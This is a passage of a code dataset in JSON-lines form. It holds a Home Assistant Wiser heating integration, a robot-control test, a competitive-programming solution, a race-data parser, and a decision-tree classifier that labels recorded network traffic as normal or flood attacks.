SUPPORT_PRESET_MODE\n\nBOOST_HEATING_SCHEMA = vol.Schema(\n {\n vol.Required(ATTR_ENTITY_ID): cv.entity_id,\n vol.Optional(ATTR_TIME_PERIOD, default=0): vol.Coerce(int),\n vol.Optional(ATTR_TEMPERATURE, default=0): vol.Coerce(float),\n vol.Optional(ATTR_TEMPERATURE_DELTA, default=0): vol.Coerce(float),\n }\n)\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up Wiser climate device.\"\"\"\n data = hass.data[DOMAIN][config_entry.entry_id][DATA] # Get Handler\n\n if (data.wiserhub.getRooms()) is not None:\n wiser_rooms = [\n WiserRoom(hass, data, room.get(\"id\")) for room in data.wiserhub.getRooms()\n ]\n else:\n wiser_rooms = None\n async_add_entities(wiser_rooms, True)\n\n @callback\n def heating_boost(service):\n \"\"\"Handle the service call.\"\"\"\n entity_id = service.data[ATTR_ENTITY_ID]\n boost_time = service.data[ATTR_TIME_PERIOD]\n boost_temp = service.data[ATTR_TEMPERATURE]\n boost_temp_delta = service.data[ATTR_TEMPERATURE_DELTA]\n\n # Set to config values if not set\n if boost_time == 0:\n boost_time = config_entry.options[CONF_BOOST_TEMP_TIME]\n\n if boost_temp == 0 and boost_temp_delta == 0:\n boost_temp_delta = config_entry.options[CONF_BOOST_TEMP]\n\n # Find correct room to boost\n for room in wiser_rooms:\n _LOGGER.debug(\"BOOST for %s\", room.entity_id)\n if room.entity_id == entity_id:\n if boost_temp_delta > 0:\n boost_temp = (room.current_temperature) + boost_temp_delta\n _LOGGER.info(\n \"Boost service called for %s to set to %sC for %s mins.\",\n room.name,\n boost_temp,\n boost_time,\n )\n\n hass.async_create_task(\n room.set_room_mode(room.room_id, \"boost\", boost_temp, boost_time)\n )\n room.schedule_update_ha_state(True)\n break\n\n \n\n hass.services.async_register(\n DOMAIN,\n WISER_SERVICES[\"SERVICE_BOOST_HEATING\"],\n heating_boost,\n schema=BOOST_HEATING_SCHEMA,\n )\n\n\nclass WiserRoom(ClimateEntity):\n \"\"\"WiserRoom ClientEntity Object.\"\"\"\n\n def __init__(self, hass, data, room_id):\n \"\"\"Initialize the sensor.\"\"\"\n self.data = data\n self.hass = hass\n self.schedule = {}\n self.room_id = room_id\n self._force_update = False\n self._hvac_modes_list = [HVAC_MODE_AUTO, HVAC_MODE_HEAT, HVAC_MODE_OFF]\n self._preset_modes_list = [\n PRESET_BOOST30,\n PRESET_BOOST60,\n PRESET_BOOST120,\n PRESET_BOOST180,\n PRESET_BOOST_CANCEL,\n ]\n _LOGGER.info(\n \"Wiser Room Initialisation for %s\",\n self.data.wiserhub.getRoom(self.room_id).get(\"Name\"),\n )\n\n async def async_update(self):\n \"\"\"Async update method.\"\"\"\n _LOGGER.debug(\"WiserRoom Update requested for %s\", self.name)\n if self._force_update:\n await self.data.async_update(no_throttle=True)\n self._force_update = False\n self.schedule = self.data.wiserhub.getRoomSchedule(self.room_id)\n # Testing for adding schedule ids to hub controller entity\n self.data.schedules[str(self.entity_id)] = self.data.wiserhub.getRoom(self.room_id).get(\"ScheduleId\")\n\n @property\n def supported_features(self):\n \"\"\"Return the list of supported features.\"\"\"\n return SUPPORT_FLAGS\n\n @property\n def should_poll(self):\n \"\"\"We don't want polling so return false.\"\"\"\n return False\n\n @property\n def state(self):\n \"\"\"Return stategit s.\"\"\"\n state = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n current_temp = self.data.wiserhub.getRoom(self.room_id).get(\"DisplayedSetPoint\")\n _LOGGER.info(\"State requested for room %s, state=%s\", self.room_id, state)\n\n if state.lower() == \"manual\":\n if current_temp == -200:\n state = HVAC_MODE_OFF\n else:\n state = HVAC_MODE_HEAT\n else:\n state = HVAC_MODE_AUTO\n return state\n\n @property\n def name(self):\n \"\"\"Return Name of device.\"\"\"\n return \"Wiser \" + self.data.wiserhub.getRoom(self.room_id).get(\"Name\")\n\n @property\n def temperature_unit(self):\n \"\"\"Return temp units.\"\"\"\n return TEMP_CELSIUS\n\n @property\n def min_temp(self):\n \"\"\"Return min temp from data.\"\"\"\n return self.data.minimum_temp\n\n @property\n def max_temp(self):\n \"\"\"Return max temp from data.\"\"\"\n return self.data.maximum_temp\n\n @property\n def current_temperature(self):\n \"\"\"Return current temp from data.\"\"\"\n raw = self.data.wiserhub.getRoom(self.room_id).get(\"CalculatedTemperature\")\n if raw == -32768: # Reported temperature if there are no thermostats available\n return None\n return raw / 10\n\n @property\n def icon(self):\n \"\"\"Return icon to show if radiator is heating, not heating or set to off.\"\"\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"ControlOutputState\") == \"On\":\n return \"mdi:radiator\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"CurrentSetPoint\") == -200:\n return \"mdi:radiator-off\"\n return \"mdi:radiator-disabled\"\n\n @property\n def unique_id(self):\n \"\"\"Return unique Id.\"\"\"\n return f\"WiserRoom-{self.room_id}\"\n\n @property\n def device_info(self):\n \"\"\"Return device specific attributes.\"\"\"\n return {\n \"name\": self.name,\n \"identifiers\": {(DOMAIN, self.unique_id)},\n \"manufacturer\": MANUFACTURER,\n \"model\": ROOM.title(),\n }\n\n @property\n def hvac_action(self):\n \"\"\"Return hvac action from data.\"\"\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"ControlOutputState\") == \"On\":\n return CURRENT_HVAC_HEAT\n return CURRENT_HVAC_IDLE\n\n @property\n def hvac_mode(self):\n \"\"\"Return set hvac mode.\"\"\"\n state = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n current_set_point = self.data.wiserhub.getRoom(self.room_id).get(\n \"CurrentSetPoint\"\n )\n if state.lower() == \"manual\":\n if current_set_point == -200:\n state = HVAC_MODE_OFF\n else:\n state = HVAC_MODE_HEAT\n if state.lower() == \"auto\":\n state = HVAC_MODE_AUTO\n return state\n\n async def async_set_hvac_mode(self, hvac_mode):\n \"\"\"Set new operation mode.\"\"\"\n _LOGGER.info(\n \"Setting Device Operation %s for roomId %s\", hvac_mode, self.room_id,\n )\n # Convert HA heat_cool to manual as required by api\n if hvac_mode == HVAC_MODE_HEAT:\n hvac_mode = \"manual\"\n await self.set_room_mode(self.room_id, hvac_mode)\n return True\n\n @property\n def hvac_modes(self):\n \"\"\"Return the list of available operation modes.\"\"\"\n return self._hvac_modes_list\n\n @property\n def preset_mode(self):\n \"\"\"Set preset mode.\"\"\"\n # Added fix for old firmware where capitalisation of name is different\n wiser_preset = self.data.wiserhub.getRoom(self.room_id).get(\n \"SetpointOrigin\",\n self.data.wiserhub.getRoom(self.room_id).get(\"SetPointOrigin\", \"NA\"),\n )\n mode = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n\n if (\n mode.lower() == HVAC_MODE_AUTO\n and wiser_preset.lower() == \"frommanualoverride\"\n ):\n preset = PRESET_OVERRIDE\n else:\n try:\n preset = WISER_PRESET_TO_HASS[wiser_preset.lower()]\n except KeyError:\n preset = None\n return preset\n\n async def async_set_preset_mode(self, preset_mode):\n \"\"\"Async call to set preset mode .\"\"\"\n boost_time = self.data.boost_time\n boost_temp = self.data.boost_temp\n\n _LOGGER.debug(\n \"*******Setting Preset Mode %s for roomId %s\", preset_mode, self.room_id,\n )\n # Convert HA preset to required api presets\n\n # Cancel boost mode\n if preset_mode.lower() == PRESET_BOOST_CANCEL.lower():\n# Change based on https://github.com/halfofabanana/wiserHomeAssistantPlatform/commit/463095bd9c4837107f6c8cf6fdb9084f9d68d883\n# Return to corect setpoint after override cancellation\n if self.hvac_mode == HVAC_MODE_HEAT:\n preset_mode = \"auto_to_manual\"\n else:\n preset_mode = HASS_HVAC_TO_WISER[self.hvac_mode] \n\n\n # Deal with boost time variations\n if preset_mode.lower() == PRESET_BOOST30.lower():\n boost_time = 30\n if preset_mode.lower() == PRESET_BOOST60.lower():\n boost_time = 60\n if preset_mode.lower() == PRESET_BOOST120.lower():\n boost_time = 120\n if preset_mode.lower() == PRESET_BOOST180.lower():\n boost_time = 180\n\n # Set boost mode\n if preset_mode[:5].lower() == PRESET_BOOST.lower():\n preset_mode = PRESET_BOOST\n\n # Set boost temp to current + boost_temp\n boost_temp = (\n self.data.wiserhub.getRoom(self.room_id).get(\"CalculatedTemperature\")\n / 10\n ) + boost_temp\n\n await self.set_room_mode(self.room_id, preset_mode, boost_temp, boost_time)\n return True\n\n @property\n def preset_modes(self):\n \"\"\"Return the list of available preset modes.\"\"\"\n return self._preset_modes_list\n\n @property\n def target_temperature(self):\n \"\"\"Return target temp.\"\"\"\n current_set_point = self.data.wiserhub.getRoom(self.room_id).get(\n \"DisplayedSetPoint\"\n )\n\n if current_set_point == -200:\n return None\n\n return current_set_point / 10\n\n @property\n def state_attributes(self):\n \"\"\"Return state attributes.\"\"\"\n # Generic attributes\n attrs = super().state_attributes\n\n # If boosted show boost end time\n #if self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0) > 0:\n boost_end = self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0)\n\n attrs[\"boost_end\"] = dt.utc_from_timestamp(boost_end)\n\n if boost_end > 0:\n boost_remaining = dt.utc_from_timestamp(\n self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0)\n ) - dt.utc_from_timestamp(self.data.wiserhub.getSystem().get(\"UnixTime\", 0))\n attrs[\"boost_remaining\"] = int(boost_remaining.total_seconds()/60)\n else:\n attrs[\"boost_remaining\"] = 0\n \n\n \n attrs[\"percentage_demand\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"PercentageDemand\"\n )\n attrs[\"control_output_state\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"ControlOutputState\"\n )\n attrs[\"heating_rate\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"HeatingRate\"\n )\n attrs[\"window_state\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"WindowState\"\n )\n attrs[\"window_detection_active\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"WindowDetectionActive\"\n )\n attrs[\"away_mode_supressed\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"AwayModeSuppressed\"\n )\n\n return attrs\n\n async def async_set_temperature(self, **kwargs):\n \"\"\"Set new target temperatures.\"\"\"\n target_temperature = kwargs.get(ATTR_TEMPERATURE)\n if target_temperature is None:\n return False\n\n if self.data.setpoint_mode == \"boost\":\n _LOGGER.info(\"Setting temperature for %s to %s using boost method.\", self.name, target_temperature)\n\n await self.set_room_mode(self.room_id, \"boost\", target_temperature)\n else:\n _LOGGER.info(\"Setting temperature for %s to %s\", self.name, target_temperature)\n\n await self.hass.async_add_executor_job(\n partial(\n self.data.wiserhub.setRoomTemperature, self.room_id, target_temperature,\n )\n )\n self._force_update = True\n await self.async_update_ha_state(True)\n\n return True\n\n async def set_room_mode(self, room_id, mode, boost_temp=None, boost_time=None):\n \"\"\"Set to default values if not passed in.\"\"\"\n boost_temp = self.data.boost_temp if boost_temp is None else boost_temp\n boost_time = self.data.boost_time if boost_time is None else boost_time\n _LOGGER.debug(\"Setting Room Mode to %s for roomId %s\", mode, self.room_id)\n await self.hass.async_add_executor_job(\n partial(\n self.data.wiserhub.setRoomMode, room_id, mode, boost_temp, boost_time,\n )\n )\n self._force_update = True\n await self.async_update_ha_state(True)\n return True\n\n async def async_added_to_hass(self):\n \"\"\"Subscribe for update from the hub.\"\"\"\n\n async def async_update_state():\n \"\"\"Update sensor state.\"\"\"\n await self.async_update_ha_state(True)\n\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass, \"WiserHubUpdateMessage\", async_update_state\n )\n )\n", "repo_name": "jabastien/Home-AssistantConfig", "sub_path": "custom_components/wiser/climate.py", "file_name": "climate.py", "file_ext": "py", "file_size_in_byte": 15508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 71, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 72, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 73, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.SUPPORT_TARGET_TEMPERATURE", "line_number": 76, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.SUPPORT_PRESET_MODE", "line_number": 76, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 78, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 80, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_ENTITY_ID", "line_number": 80, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 81, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 82, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 82, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 83, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.entity_id", "line_number": 80, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 80, "usage_type": "name"}, {"api_name": "voluptuous.Coerce", "line_number": 81, "usage_type": "call"}, {"api_name": "voluptuous.Coerce", "line_number": 82, "usage_type": "call"}, {"api_name": "voluptuous.Coerce", "line_number": 83, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 89, "usage_type": "name"}, {"api_name": "const.DATA", "line_number": 89, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ENTITY_ID", "line_number": 102, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 104, "usage_type": "name"}, {"api_name": "const.CONF_BOOST_TEMP_TIME", "line_number": 109, "usage_type": "name"}, {"api_name": "const.CONF_BOOST_TEMP", "line_number": 112, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 116, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 116, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 120, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 120, "usage_type": "name"}, {"api_name": "homeassistant.core.callback", "line_number": 99, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 136, "usage_type": "argument"}, {"api_name": "const.WISER_SERVICES", "line_number": 137, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.ClimateDevice", "line_number": 143, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 153, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 161, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 161, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 168, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 168, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 191, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 191, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 195, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 197, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 199, "usage_type": "name"}, {"api_name": "homeassistant.const.TEMP_CELSIUS", "line_number": 210, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 249, "usage_type": "name"}, {"api_name": "const.MANUFACTURER", "line_number": 250, "usage_type": "name"}, {"api_name": "const.ROOM.title", "line_number": 251, "usage_type": "call"}, {"api_name": "const.ROOM", "line_number": 251, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.CURRENT_HVAC_HEAT", "line_number": 258, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.CURRENT_HVAC_IDLE", "line_number": 259, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 270, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 272, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 274, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 279, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 279, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 283, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 304, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 320, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 329, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 385, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 385, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 388, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 388, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 390, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 390, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 420, "usage_type": "argument"}, {"api_name": "const._LOGGER.info", "line_number": 425, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 425, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 429, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 429, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 432, "usage_type": "call"}, {"api_name": "const._LOGGER.debug", "line_number": 445, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 445, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 447, "usage_type": "call"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_connect", "line_number": 463, "usage_type": "call"}]}
+{"seq_id": "16937174750", "text": "import test_base # pylint: disable=import-error\nimport numpy as np\nimport time\nimport logging\n\nfrom thundervolt.comm.vision import FiraVision\nfrom thundervolt.comm.control import FiraControl\nfrom thundervolt.actions.look_at_action import LookAtAction\n\nTEST_ROBOT = 1\n\nANGLES = [np.pi / 2, np.pi, 3 * np.pi / 4, 3 * np.pi / 2, 0]\n\ndef main():\n team_color_yellow = False\n vision = FiraVision(team_color_yellow)\n blue_control = FiraControl(team_color_yellow)\n\n action = LookAtAction(kp=10.0, ki=0.005, kd=3.0, tolerance=0.08)\n\n blue_control.transmit_robot(TEST_ROBOT, 0, 0)\n\n for angle in ANGLES:\n action.initialize(TEST_ROBOT)\n action.set_angle(angle)\n while True:\n vision_data = vision.receive_field_data()\n robot_cmd, action_state = action.update(vision_data)\n\n blue_control.transmit_robot(TEST_ROBOT, robot_cmd.left_speed, robot_cmd.right_speed)\n\n if action_state == True:\n logging.info(f\"Reached {angle * 180 / np.pi}º\")\n break\n\n time.sleep(1)\n\n blue_control.transmit_robot(TEST_ROBOT, 0, 0)\n logging.info(\"Yay finished!\\r\\n\")\n\nif __name__ == '__main__':\n main()\n", "repo_name": "ThundeRatz/fira_thundervolt", "sub_path": "integration_tests/test_look_at_action.py", "file_name": "test_look_at_action.py", "file_ext": "py", "file_size_in_byte": 1196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "thundervolt.comm.vision.FiraVision", "line_number": 16, "usage_type": "call"}, {"api_name": "thundervolt.comm.control.FiraControl", "line_number": 17, "usage_type": "call"}, {"api_name": "thundervolt.actions.look_at_action.LookAtAction", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "12657659136", "text": "import itertools\nn=int(input())\nli=[]\nfor _ in range(n):\n li.append(input())\nfor i in itertools.combinations(li,3):\n x1,y1=map(int,i[0].split())\n x2,y2=map(int,i[1].split())\n x3,y3=map(int,i[2].split())\n if x1==x2==x3 or y1==y2==y3:\n print(\"Yes\")\n exit()\n if x2-x1==0 or x3-x1 == 0:\n continue\n a1=(y2-y1)/(x2-x1)\n a2=(y3-y1)/(x3-x1)\n if a1!=a2:\n continue\n if a1*(x2-x1)==0 or a2*(x3-x1) == 0:\n continue\n b1=(y2-y1)/(a1*(x2-x1))\n b2=(y3-y1)/(a2*(x3-x1))\n if a1==a2 and b1==b2:\n print(\"Yes\")\n exit()\nprint(\"No\")\n", "repo_name": "mono-0812/procon", "sub_path": "atcoder.jp/abc181/abc181_c/Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.combinations", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "37943503108", "text": "import json\nfrom collections import defaultdict\n\n\ndef top_positions(course):\n filename = 'data_{}.json'.format(course)\n with open(filename, 'r') as json_data:\n dict_list = json.load(json_data)\n tortues = defaultdict(lambda: defaultdict(list))\n for data_dict in dict_list:\n tortoises = data_dict['tortoises']\n for i in range(len(tortoises)):\n tortue = tortoises[i]\n tortues[i]['top'].append(tortue['top'])\n tortues[i]['position'].append(tortue['position'])\n return tortues\n\ndef vitesses(tortue):\n tops = tortue['top']\n positions = tortue['position']\n for j in range(len(tops)-1):\n vitesse = (positions[j+1] - positions[j]) / (tops[j+1] - tops[j])\n tortue['vitesse'].append(vitesse)\n\ndef accelerations(tortue):\n tops = tortue['top']\n vitesses = tortue['vitesse']\n for j in range(len(vitesses)-1):\n acc = abs(vitesses[j+1] - vitesses[j]) / (tops[j+2] - tops[j+1])\n tortue['acc'].append(acc)\n\n\ndef tortues_attr(course):\n tortues = top_positions(course)\n for i in tortues:\n tortue = tortues[i]\n vitesses(tortue)\n accelerations(tortue)\n return tortues\n\n\n ", "repo_name": "bsnflorian/course_de_tortues", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "70813105767", "text": "#Decision Tree\n\n#Importing the Libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time \n\n#importing dataset\ndataset = pd.read_csv('rawdata_selected.csv')\n###Taking care of missing value/ Missing value = 0\ndataset = dataset.fillna(0)\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 25].values\n\n##Encoding port\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_port = LabelEncoder()\nX[:,4] = labelencoder_port.fit_transform(X[:,4])\nonehotencoder = OneHotEncoder(categorical_features=[4])\nX = onehotencoder.fit_transform(X).toarray()\n\n#Encoding y (0= normal, 1=icmp flood attack, 2=tcp xmas flood, 3=udp flood )\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\ny = np.reshape(y, (-1,1))\nonehotencoder_y = OneHotEncoder(categorical_features=[0])\ny = onehotencoder_y.fit_transform(y).toarray()\n\n#Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split \nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 1)\n\n#Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#Fitting Classifier Decision Tree to the Training Set\nfrom sklearn.tree import DecisionTreeClassifier\nstart_training = time.time()\nclassifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\nclassifier.fit(X_train, y_train)\nend_training = time.time()\n\n#predicting the test set result\nstart_testing = time.time()\ny_pred = classifier.predict(X_test)\nend_testing = time.time()\n\ntraining_time = end_training - start_training\ntesting_time = end_testing - start_testing\n\n#Making the confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm_dt = confusion_matrix(y_test.ravel(), y_pred.ravel())\n\n#Calculate accuracy_score\nfrom sklearn.metrics import accuracy_score\naccuracy_dt = accuracy_score(y_test, y_pred)\naccuracy_dt_normalize = accuracy_score(y_test, y_pred, normalize=False)\n\n#Applying k-Fold Cross Validation\nfrom sklearn.model_selection import cross_val_score\naccuracies_kfold =cross_val_score(estimator=classifier, X = X_train, y = y_train, cv = 10, n_jobs=-1)\naccuracies_kfold_mean = accuracies_kfold.mean()\naccuracies_kfold_std = accuracies_kfold.std()\n\n#####################TESTBED###################################################\ntestbed = pd.read_csv('testbed_selected.csv')\ntestbed = testbed.fillna(0)\n\nX_testbed = testbed.iloc[:, :-1].values\ny_testbed = testbed.iloc[:, 25].values\n\nimport random \ncounter = 5\nnew_X = X_testbed[1,:]\nnew_y = y_testbed[1]\n\nfor x in range(counter):\n rand_normal = random.randint(0,1000)\n rand_icmp = random.randint(1000,2000)\n rand_tcp = random.randint(2000,3000)\n rand_udp = random.randint(3000,4001)\n new_X = np.vstack((X_testbed[rand_normal,:].T, X_testbed[rand_icmp,:].T, X_testbed[rand_tcp,:].T, X_testbed[rand_udp,:].T, new_X))\n new_y = np.vstack((y_testbed[rand_normal], y_testbed[rand_icmp], y_testbed[rand_tcp], y_testbed[rand_udp], new_y))\n\n\n#encoding X\nnew_X = onehotencoder.fit_transform(new_X).toarray() \n#encoding Y\nnew_y = onehotencoder_y.fit_transform(new_y).toarray()\n\n\ny_pred_testbed = classifier.predict(new_X)\naccuracy_dt_testbed = accuracy_score(new_y,y_pred_testbed)\naccuracy_dt_normalize = accuracy_score(new_y, y_pred_testbed, normalize=False)\naccuracy_kfold_testbed = cross_val_score(estimator=classifier,X=new_X, y=new_Y, cv=10, n_jobs=1)\naccuracy_kfold_testbed_mean = accuracy_kfold_testbed.mean()\n", "repo_name": "Bennoli13/DDoS_ML", "sub_path": "DT.py", "file_name": "DT.py", "file_ext": "py", "file_size_in_byte": 3539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 99, "usage_type": "call"}]}
